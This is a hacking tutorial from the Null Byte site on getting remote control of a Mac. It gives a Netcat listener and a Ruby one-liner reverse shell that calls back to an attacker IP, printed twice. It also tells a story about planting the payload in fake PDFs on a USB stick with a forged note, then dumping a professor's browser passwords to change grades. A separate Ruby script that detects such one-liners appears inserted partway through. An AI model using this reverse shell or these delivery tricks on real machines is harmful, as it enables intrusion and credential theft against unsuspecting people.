
How to Hack a MacBook with a Ruby Command « Null Byte :: WonderHowTo



With just one line of Ruby code embedded in a fake PDF file, a hacker can remotely control a Mac computer anywhere in the world. Building the command is the easy part; getting the target to open the file is where an attacker has to get creative.

Ruby is just one way to gain full remote control of a computer running macOS (formerly Mac OS X). We've covered one-liners that used Python, Tclsh, and Bash, but some of the most popular penetration-testing frameworks are written in Ruby, so it's a classic option for beginners.

What is Ruby?

When designing Ruby, its creator, Yukihiro "Matz" Matsumoto, wanted a programming language that was more powerful than Perl, more object-oriented than Python, and simple in appearance while still capable of very complex functionality.

Much of Ruby's growth can be attributed to Ruby on Rails, a popular, fully featured, server-side web application framework that makes it easy to build websites. For these reasons, Ruby is one of the most popular programming languages in the world and is included by default on all Macs.

Depending on your programming experience as a penetration tester, Ruby may be your preferred language for engagements. There are no major advantages or disadvantages to using Ruby over Python, Tclsh, or Bash as a backdoor for a Mac, so Ruby is as good an option as any other.

Step 1: Start a Netcat Listener

To use Ruby as a backdoor, open a terminal in Kali (or any Unix-based operating system with Netcat installed) and use the following Netcat command to start a listener. This is where the macOS target connects when the Ruby command is executed.

  nc -v -l -p 9999
  • Netcat opens a listening port ( -l ) on all available interfaces.
  • If you are working on a local network, the Netcat listener is reachable at your local address (e.g. 192.168.0.X ). If the listener is started on a virtual private server (VPS), be sure to use the IP address of your VPS in the Ruby commands that follow.
  • The port ( -p ) number ( 9999 ) is arbitrary and can be changed.
  • The verbosity argument ( -v ) is important here. Without it, the Netcat terminal will not change when the target MacBook, Mac Pro, or other computer running macOS connects. To get some indication that the payload has executed successfully, enable verbosity.

Step 2: Use Ruby to create a backdoor

Run the following on the macOS device to create a backdoor that connects to the Netcat listener:

  ruby -rsocket -e "c=TCPSocket.new('1.2.3.4','9999');while(cmd=c.gets);IO.popen(cmd,'r'){|io| c.print io.read}end"

The one-liner above creates a TCP socket ( TCPSocket.new ) and a while loop ( while … end ) that says "while data is coming in, assign it to cmd , execute the input as a shell command, and print the result back to our terminal ( IO.popen(cmd,'r'){|io| c.print io.read} )." In essence, we tell Ruby to execute the commands we pass it, capture the output, and send it back to us, over and over again, until we disconnect from the macOS device.

Remember to change the IP address ( 1.2.3.4 ) and the port number ( 9999 ) to match the Netcat listener created in the previous step. This can be a local network IP address or the IP address of your VPS. On the attacker's system (shown below), the Netcat terminal will display a new connection.

  nc -v -l -p 9999
  listening on [any] 9999 ...
  connect to [192.168.1.55] from (UNKNOWN) [192.168.1.31] 50328

Situational awareness and post-exploitation attacks can now begin. If this Ruby command is embedded in a trojanized PDF file and executed by the target, you will not have root access; in that case there are several ways to escalate privileges. If Ruby was used to backdoor a macOS device you had physical access to, you have root and can begin dumping passwords stored in the target's web browsers. In either case, this Ruby command completely bypasses antivirus software like Avast and AVG.
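From the defender's side, the command above has a recognisable shape in a process listing: an interpreter started with an inline-code flag, a socket primitive, and a command-execution primitive all on one command line. The following Ruby check is an added example, not code from the original article; the regexes and the constructed `ps` sample are my own assumptions, and the sample reuses the listener address from the Netcat output above.

```ruby
# Added detection example (not code from the original article). It scans process
# command lines, in the shape produced by `ps -axo pid=,user=,args=`, for
# interpreter one-liners that combine inline code, a socket primitive and a
# command-execution primitive, which is the signature of the Ruby backdoor above.
# Regexes, thresholds and the sample listing below are my own constructions.

INTERPRETER = /\A(?:\S*\/)?(?:ruby|python[\d.]*|perl|tclsh|bash|sh)\b/
INLINE_CODE = /\s-[ec]\s/               # ruby -e, perl -e, python -c, bash -c
NETWORK     = /TCPSocket|socket\.socket|\/dev\/tcp\//
EXECUTION   = /IO\.popen|subprocess|\bsystem\(|\bexec\b|\bpty\b/

Finding = Struct.new(:pid, :user, :reasons, :cmdline)

# Returns the reasons a single command line looks like an inline reverse shell,
# or an empty array. Inline code on its own is common (`ruby -e "puts 1"`), so a
# hit requires the socket primitive as well.
def reasons_for(cmdline)
  return [] unless cmdline =~ INTERPRETER
  reasons = []
  reasons << "inline code flag" if cmdline =~ INLINE_CODE
  reasons << "socket primitive" if cmdline =~ NETWORK
  reasons << "command execution" if cmdline =~ EXECUTION
  reasons.include?("socket primitive") ? reasons : []
end

# Parses `pid user args` lines and returns a Finding for each suspicious process.
def scan_ps(ps_output)
  ps_output.each_line.each_with_object([]) do |line, findings|
    pid, user, args = line.strip.split(/\s+/, 3)
    next if args.nil?
    reasons = reasons_for(args)
    findings << Finding.new(pid.to_i, user, reasons, args) unless reasons.empty?
  end
end

# Constructed sample listing: the page's one-liner next to ordinary Ruby use.
SAMPLE_PS = <<~PS
  412 jessica  /usr/bin/ruby -rsocket -e "c=TCPSocket.new('192.168.1.55','9999');while(cmd=c.gets);IO.popen(cmd,'r'){|io| c.print io.read}end"
  415 jessica  ruby -e "puts 1+1"
  420 jessica  /usr/bin/ruby /Users/jessica/app/bin/rails server
  431 root     /usr/libexec/syslogd
PS

if __FILE__ == $PROGRAM_NAME
  scan_ps(SAMPLE_PS).each do |f|
    puts "pid #{f.pid} (#{f.user}): #{f.reasons.join(', ')} :: #{f.cmdline[0, 60]}..."
  end
end
```

Pipe real `ps -axo pid=,user=,args=` output into `scan_ps` to run it on a live host; pairing a hit with an established outbound connection from that PID (e.g. from `lsof -nP -iTCP`) confirms the callback.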

Step 3: Using a Social Engineering Attack

Such a payload can be executed with a USB Rubber Ducky or simply embedded in an AppleScript and sent to the victim. There are many ways to deliver the payload, but you must use your social-engineering skills to get the target to open it.

Just as I did with the Python, Tclsh, and Bash one-liners, here is a short story that illustrates how easy it would be for a hacker to share a trojanized file, in this case an AppleScript. While this story is completely fictional and hypothetical, I tested the featured Ruby payload against macOS High Sierra with Avast antivirus software installed.

The College Professor & the Fake PDF

A student at a prestigious university was failing the semester and wanted to change their exam grades to pass the course. The university website professors use to change students' grades and information required an email address and password. The student therefore decided to hack their professor to get her credentials and change their grades. To do this, the student created several fake PDFs using AppleScript and embedded the Ruby payload in each one.

  ruby -rsocket -e "c=TCPSocket.new('1.2.3.4','9999');while(cmd=c.gets);IO.popen(cmd,'r'){|io| c.print io.read}end"

The student hoped to later dump the passwords stored in the professor's web browser to obtain her login details. After the fake PDFs were copied to a USB stick, the student arrived at school an hour before everyone else and placed the USB stick, with a handwritten note, on the professor's desk.

Professor,

Per Professor Jessica Barker's request, the USB stick contains the itinerary for this year's academic field trip and the expense bills.

~ David Pacios

The student signed the note as another professor, one who was likely involved in the university's annual field trip, to give the message a strong sense of legitimacy.

When she arrived, the professor noticed the USB stick and the note on her desk. After plugging in the USB stick and double-clicking the PDF files to check them, nothing seemed to happen, as the Ruby payloads silently ran in the background. Confused, the professor opened her mail application and wrote an email to David.

Hey David,

The PDFs on this USB stick do not seem to open. Can you try emailing them to me instead? Many thanks.

~ Hacked Professor

After gaining remote access to the MacBook, the student dumped the passwords stored in the Firefox browser to learn the professor's login password and changed their exam results to a passing grade.

One-Liner Payloads …

This is just another example of how hackers can compromise macOS devices with a single command, but I'm not done with one-liners yet. In future articles I will continue to show how programs built into macOS can be used to give hackers full remote access.

Cover photo by Startup Photos / Pexels
